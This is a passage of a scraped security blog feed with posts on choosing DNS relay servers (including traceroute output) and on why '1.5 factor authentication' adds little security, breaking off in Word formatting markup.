mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><a href="https://www.ssllabs.com/ssltest/">https://www.ssllabs.com/ssltest/</a></span><br /><span style="font-family: &quot;Calibri&quot;,&quot;sans-serif&quot;; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-AU; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: &quot;Times New Roman&quot;; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">After this you may want to change your cipher suites, which now in 2008r2 can be done in gpedit. Anyway that is for this quick brain dump. </span>Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-7029640843029631232012-12-05T20:35:00.000+11:002013-01-21T01:37:02.073+11:00DNS relay serversThis one maybe boring security for some, but a lot of people I meet who claim to be in security forget the very important, possibly critical CIA model of security. No I don't mean the Central Intelligence Agency, I mean Confidentiality, Integrity and Availability. These three things are the key to good security infrastructure, and DNS is part of at least the last two.<br /><br />Generally speaking if you are a small to medium business, you will have a DNS server in your environment. You could just leave it as default pointed to the root servers to do external resolutions for your clients, but in geographically disperet countries like Australia that can lead to resolutions failures due to the latency to the root servers that is sometimes experienced. If you have a big enough pipe this latency is manageable and won't cause an issue, though a bit of contention can begin to cause problems. My suggestion was usually to specify DNS relay servers. This allows you to relay your requests to your ISP, especially good if your ISP blocks lookups to the root servers which I have also seen. But should you just specify your ISP's DNS... well when I first started doing this that is what I did. Till the ISP the client was using had their DNS cache poisoned and a few popular sites started coming badly, and other times where the ISPs DNS failed or changed without notice.<br />So I started setting a second or third that was with a different ISP, but was known publically accessable, either Optus or Telstra as they are/were our biggest ISP's in Australia at the time. I eventually started also adding OpenDNS and googles DNS to my reportaire, especially OpenDNS's premium services with clients that wanted the blocking that a proxy gives without the infrastructure or upfront cost, yes I know you can get round it by simply knowing the ip of a malicious site, but it was better than unencumbered internet feeds. I am not a shill I don't even have an OpenDNS account anymore.<br /><br />This worked very well. But just today while troubleshooting an issue I fired up WinMTR, a windows port of the Linux tool Multi-Trace-Route (MTR), very useful at finding a hop in your route that could be having issues. As usual I used these memorised Optus and Telstra DNS servers to check my routes and I found packet loss (there was an issue with my ISP's bridging router into PIPE it seemed). Then I tested to my ISP's DNS, all good no packets dropped and only 4 hops, then I thought hmm I should test to googles open DNS servers, just to see;<br />|-----------------------------------------------------------------------------------------------------|<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; WinMTR statistics&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; |<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Host&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp;&nbsp; &nbsp;&nbsp; -&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; %&nbsp; | Sent | Recv | Best | Avrg | Wrst | Last |<br />|-------------------------------------------------------|-------|-------|-------|-------|--------|-------|<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; x-x-x-x.tpgi.com.au -&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; &nbsp;&nbsp; 0 |&nbsp;&nbsp;&nbsp; &nbsp; 5 | &nbsp;&nbsp; 55&nbsp; |&nbsp;&nbsp; &nbsp;&nbsp; 1&nbsp; | &nbsp;&nbsp; &nbsp; 3 | &nbsp;&nbsp;&nbsp;&nbsp; 81 |&nbsp;&nbsp; &nbsp;&nbsp; 4 |<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; x.x.x-x.tpgi.com.au -&nbsp;&nbsp;&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 2 |&nbsp;&nbsp;&nbsp; 55 |&nbsp; &nbsp; 54&nbsp; |&nbsp;&nbsp; &nbsp; 23 |&nbsp;&nbsp;&nbsp; 28 |&nbsp;&nbsp;&nbsp; 114 | &nbsp;&nbsp; 24 |<br />| syd-nxg-men-crt2-ge-3-1-0.tpgi.com.au -&nbsp;&nbsp;&nbsp; 0 |&nbsp; &nbsp; 55 |&nbsp;&nbsp;&nbsp; 55&nbsp; | &nbsp; &nbsp; 48 |&nbsp; &nbsp; 69 |&nbsp;&nbsp;&nbsp; 159 | &nbsp;&nbsp; 67 |<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 202.7.171.46 -&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 0 | &nbsp;&nbsp; 55 |&nbsp;&nbsp;&nbsp; 55&nbsp; |&nbsp; &nbsp;&nbsp; 25 |&nbsp;&nbsp;&nbsp; 33 |&nbsp;&nbsp;&nbsp; 124 |&nbsp; &nbsp; 28 |<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 72.14.237.21 -&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 4 |&nbsp;&nbsp;&nbsp; 55 | &nbsp;&nbsp; 53&nbsp; | &nbsp; &nbsp; 26 |&nbsp; &nbsp; 28 | &nbsp; &nbsp;&nbsp; 43 |&nbsp; &nbsp; 32 |<br />|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; google-public-dns-a.google.com -&nbsp; &nbsp; &nbsp;&nbsp; 2 |&nbsp; &nbsp; 54 |&nbsp;&nbsp;&nbsp; 53&nbsp; | &nbsp; &nbsp; 44 |&nbsp;&nbsp;&nbsp; 70 |&nbsp;&nbsp;&nbsp; 151 |&nbsp;&nbsp;&nbsp; 76 |<br />|_____________________________________|______|______|______|______|______|<br />&nbsp;&nbsp; WinMTR - 0.8. Copyleft @2000-2002 Vasile Laurentiu Stanimir&nbsp; ( stanimir@cr.nivis.com )<br /><br />Yeah there is a little packet loss there, issues with my connection, but only 6 hops is impressive. It wasn't this way when it first started, I remember using google dns early on and seeing latency of 100+ms and about 10-15hops, I quickly realised of course they are google, they are now using <a href="http://en.wikipedia.org/wiki/Anycast">Anycast</a>, a quick traceroute from elsewhere in the world (thanks to <a href="http://centralops.net/co/">centralops tools</a>)confirmed this due to the different route (more hops lower response time, but the first 5 are internal);<br /><table border="0" cellpadding="3" cellspacing="1"><tbody><tr><td align="right" width="20">1</td> <td align="right" width="40">1</td> <td align="right" width="40">1</td> <td align="right" width="40">1</td> <td width="4"></td> <td width="200">70.84.211.97</td> <td>61.d3.5446.static.theplanet.com</td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">2</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">70.87.254.1</td> <td>po101.dsr01.dllstx5.networklayer.com</td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">3</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">70.85.127.105</td> <td>po51.dsr01.dllstx3.networklayer.com</td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">4</td> <td align="right" width="40">2</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">173.192.18.228</td> <td>ae16.bbr02.eq01.dal03.networklayer.com</td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">5</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">173.192.18.208</td> <td>ae7.bbr01.eq01.dal03.networklayer.com</td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">6</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">50.97.16.37</td> <td><br /></td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">7</td> <td align="right" width="40">1</td> <td align="right" width="40">0</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">72.14.233.77</td> <td><br /></td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">8</td> <td align="right" width="40">1</td> <td align="right" width="40">1</td> <td align="right" width="40">0</td> <td width="4"></td> <td width="200">72.14.237.219</td> <td><br /></td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">9</td> <td align="right" width="40">7</td> <td align="right" width="40">7</td> <td align="right" width="40">7</td> <td width="4"></td> <td width="200">216.239.47.121</td> <td><br /></td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">10</td> <td align="right" width="40">7</td> <td align="right" width="40">7</td> <td align="right" width="40">7</td> <td width="4"></td> <td width="200">216.239.46.59</td> <td><br /></td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"> <tbody><tr> <td align="right" width="20">11</td> <td align="right" width="40">*</td> <td align="right" width="40">*</td> <td align="right" width="40">*</td> <td width="4"></td> <td width="200"><br /></td> <td><br /></td> </tr></tbody></table><table border="0" cellpadding="3" cellspacing="1"><tbody><tr><td align="right" width="20">12</td> <td align="right" width="40">7</td> <td align="right" width="40">7</td> <td align="right" width="40">7</td> <td width="4"></td> <td width="200">8.8.8.8</td> <td>google-public-dns-a.google.com</td></tr></tbody></table><br /><br />So, moral of the story. If like me you are using one of the aformentioned or external DNS in replacement or addition to your ISP, now is a good time to move to Googles DNS, as it is probably faster than everyone else bar your ISP, and gives you a bit of redundancy. As one of my colleagues used to joke, if Google is down, the internet is down.<br />I did read something interesting in my travels researching this, Geographic aware DNS (aka GeoDNS), there is a patch for Bind and a fork of DJBDNS here; http://geoipdns.org/. Interesting, it is a similar idea I discussed with a colleague a few years ago and tested implementing in a kluge style way with Microsofts DNS server, this implementation is a lot smoother however.<br /><br />Oh and there is an update to my previous post on 1.5 factor auth. Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-62970091014030431602012-11-13T21:32:00.000+11:002015-11-25T15:53:35.207+11:00"1.5 factor authentication"?A colleague recently tried to convince me that "1.5 factor authentication" was better than 1 factor so I decided to look into it.<br /><br />First some basics, generally speaking Authentication works at its most basic level on computer systems via a username and password. This is 1-factor authentication. It is something that is unprotected and possibly public your username and something that should be kept hidden and secret your password or passphrase.<br />The 2nd factor of authentication in 2 factor authentication is the combination of something you have, some kind of encrypted token (usb key, rfid token, smart card, numeric-alpha numeric token; ala RSA SecureID and Wikid soft tokens).<br />The 3rd factor of authentication is something new, but it requires the first two in addition to another something you are. Eg; thumbprint, voice print, etc. Basically the 3rd factor is the addition of biometrics. I am really not a fan of biometrics as the only method of authentication as you can reissue a security token but you can't reissue your thumb. I can see having it in addition though would be workable.<br /><br />See here for a more in-depth PCI view of these three widely accepted Authentication factors; <a href="http://pciguru.wordpress.com/2010/05/01/one-two-and-three-factor-authentication/">http://pciguru.wordpress.com/2010/05/01/one-two-and-three-factor-authentication/</a><br /><br />There is also a not yet well supported but interesting idea for a 4th factor. So in addition to all the other factors the computer or website or what-have-you authenticates that you are where you say you are. This 4th factor is hard to implement at the moment, and they are obviously trying to make it transparent to the end user, so say you have an app on your phone that fires up GPS and sends it through to ensure you are logging in from areas you have pre-defined. I actually heard of someone using log correlation years ago to this effect, basically they watched logins from the internal network and VPN concentrators and if a user attempted to VPN in from a geographically remote IP when they had only recently been seen more geographically locally or even on network then they would shut down the geographically remote session. I can't find the article now, but this supposed shut down a hacker trying to get into this USA based company using an Execs credentials via the VPN from South America when the exec had been seen on the local network only minutes earlier.<br />See here for more on 4th factor; <a href="http://blog.dustintrammell.com/2008/11/21/four-factor-authentication/">http://blog.dustintrammell.com/2008/11/21/four-factor-authentication/</a><br /><br />Now to get to 1.5 factor auth. I couldn't find much ;<br />Market-speak; <a href="http://blog.mailchimp.com/introducing-alterego-1-5-factor-authentication-for-web-apps/">http://blog.mailchimp.com/introducing-alterego-1-5-factor-authentication-for-web-apps/</a><br />Comment decrying it for being touted as 2 factor auth; <a href="http://stackoverflow.com/questions/559639/what-is-two-factor-authentication">http://stackoverflow.com/questions/559639/what-is-two-factor-authentication</a><br />Market-speak, but interesting implementation; <a href="http://pingrid.org/">http://pingrid.org/</a><br />Very aptly named blog; <a href="http://www.ryanhicks.net/blog/2008/10/15-factor-authentication.html">http://www.ryanhicks.net/blog/2008/10/15-factor-authentication.html</a><br />But onto this colleagues definition: 1.5 factor auth is a password and a pin... So still two things that you know. Yes it maybe prettied up in the case of pingrid or horrible and easy to break as in the case of the below screenshot from a banking institution here in Australia that I used to use, but still two somethings that you know, by definition still one factor, aka one of the definitions of factors above.<br /><br /><a href="http://2.bp.blogspot.com/-Q4zhtQBO9vg/UKHBuOINzQI/AAAAAAAAAaY/_2WWTU6x9vI/s1600/1.factor.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-Q4zhtQBO9vg/UKHBuOINzQI/AAAAAAAAAaY/_2WWTU6x9vI/s1600/1.factor.jpg" /></a>Onto the example I mentioned earlier, I used to use a financial institution that I believe started using the below (this is a mock-up I no longer have an account there) "extra factor" in 2003, I laughed when I first saw it, realising it added no real security. The idea is that you pick three images and you have to click them in order, the images get shuffled each login.<br />As I watched after more logins I noticed that the pictures changed, every time, except the pictures I as a user had to click, so if a user had my username and password they could simply login several times see the picture auth, note down the pictures then exit, do this a large enough number of times and like a game of "guess who" you have narrowed down the pictures needed to authenticate in this step. As there are only three and you need to click them in order you have to only make 6 failed attempts and you will have it.<br /><br />The problem with this 1.5 factor is depending on the implementation it could be almost 50% more security that 1 factor but in the case of the above image that is probably 1.0000000000000001 factor. The other issue is even if it is 50% better than 1 factor it is not 50% worse than 2 factor, 2 factor is insanely better than 1 factor, coming back to implementation of course but even the worst is orders of magnitude better. Have a look at how complex pingrid is, I doubt that most end users would pick this up quickly and I would say 90% will write down what they have to do and what they do, do to get authenticated, this makes it no longer something that is kept secret, and may make authentication for legitimate users so hard that they fail more often, causing increased support calls and decreased productivity.<br /><br />This half factor addition is bad market speak at best, and a false sense of security with a move to introducing vulnerabilities in the authentication chain at worst.<br /><br />UPDATE: Being the security geek I am, I decided to email the venerable <a href="http://www.schneier.com/">Bruce Schneier</a> and his word from on high matches my own, "It doesn't (add security). It's a marketing ploy." Squeee I got a reply for Bruce Schneier... but yeah 1.5 factor is bs, coffin closed and put to bed.Morgannoreply@blogger.com0tag:blogger.com,1999:blog-7184718389860127472.post-19636233273591329702012-09-11T20:29:00.000+10:002012-09-12T10:25:35.987+10:00Securing your environment<!--[if gte mso 9]><xml> <o:OfficeDocumentSettings> <o:AllowPNG/> </o:OfficeDocumentSettings></xml><![endif]--><br /><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-AU</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:EnableOpenTypeKerning/> <w:DontFlipMirrorIndents/> <w:OverrideTableStyleHps/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="&#45;-"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" 